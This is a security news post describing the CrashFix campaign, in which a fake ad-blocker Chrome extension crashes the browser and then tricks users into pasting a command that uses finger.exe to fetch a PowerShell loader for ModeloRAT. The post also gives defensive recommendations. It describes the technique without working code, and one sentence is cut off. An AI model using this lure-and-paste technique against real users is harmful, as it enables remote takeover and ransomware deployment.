• Posted by: Eng. Donya Bino
• January 19, 2026

CrashFix Chrome Extension Attack Delivers ModeloRAT to Businesses

KongTuke (a.k.a. TAG 124) a traffic distribution service (TDS) with a long history of distributing ransomware and loader malware is behind this campaign, which deploys a new type of remote access trojan (RAT) known as ModeloRAT, and focuses primarily on businesses.

The attack starts with malicious ads related to ad blockers. When someone searches for these, they are redirected to the Chrome Web Store where they find a fake extension entitled “NexShield – Advanced Web Guardian” on the original Chrome Web Store.
1. It gives the impression that it's an exact duplicate of the uBlock Origin Lite extension
2. It waits for 60 minutes to be used to avoid detection
3. It sends a unique victim ID to KongTuke
4. It executes hostile act every 10 minutes

The CrashFix Trick
The extension will create a denial of service (DoS) loop to exhaust the memory on Chrome causing it to be unresponsive and for it to crash after it has been activated.
Once the user restarts the browser, a fake security warning will appear, informing them that they have suffered an unexpected shutdown of the browser. The warning directs the user:
1. To open the Windows "Run" command,
2. To copy an existing command,
3. To run it to "normalize" the situation.
This type of social engineering supersedes the act of exploitation.

The Delivery and Execution of the Payload
Once the user pastes that command, it runs finger.exe (a legitimate utility in Windows) to request a PowerShell payload from an attacker controlled server.

The full sequence of malware includes:
1. Dual-layered Base64 & XOR obfuscation method
2. Anti-Analysis methods that check host for Debuggers, Sandboxes, or Virtual Machines.
3. Host checks to determine if host is Domain Joined or Standalone
The final payload will only be delivered to Domain Joined Hosts, ModeloRA

What Is ModeloRAT?
ModeloRAT is a features-rich Remote Access Tool (RAT) that has been developed for use on Microsoft Windows and it is written in Python. It has been developed to have stealthy capabilities while also providing persistent operations.

ModeloRAT Offered Features:
1. Command & Control (C2) Encrypted Communications, using RC4 Technology
2. Persistent Registry Entries
3. Capable of Running:
 a. Executable Files (.EXE)
 b. Dynamic Link Libraries (.DLL)
 c. PowerShell Commands
 d. Python Code
4. Automatically Randomization of Beacons Based on Unique Devices and Frequency Settings
5. Self-Updating and Termination Functionality
The actions of this RAT indicate that it may be used after being exploited, usually leading to the deployment of ransomware.

Implications for Businesses
The following are some of the examples of modern risks associated with this campaign:
1. Trusting platforms like the Chrome Web Store for Content
2. Security products often overlook Browser Extensions
3. User frustration is now used as a vector for exploitation
4. Corporate Environments Are Often Specifically Targeted
The KongTuke RAT provides access to ransomware gangs, making the ability to detect it early very important.

Defensive Recommendations
1. All organizations should enforce policies to restrict installation of browser extensions.
2. Establish monitoring systems to track abnormal browser crashes.
3. Prevent misuse of native Windows tools such as |finger.exe, powershell.exe| through policy and technical controls.
4. Educate users that legitimate fixes for security problems do not require entering command strings by pasting them into the command prompt.
5. Track and alert based on clipboard based execution patterns.

Key Takeaway
CrashFix demonstrates that attackers have evolved beyond exploiting traditional software vulnerabilities to successfully carrying out their attacks; instead they now participate by exploiting the elements of trust, convenience, and frustration on the part of users as a means for creating the workflow/process in which the attack occurs.

Source: The Hacker News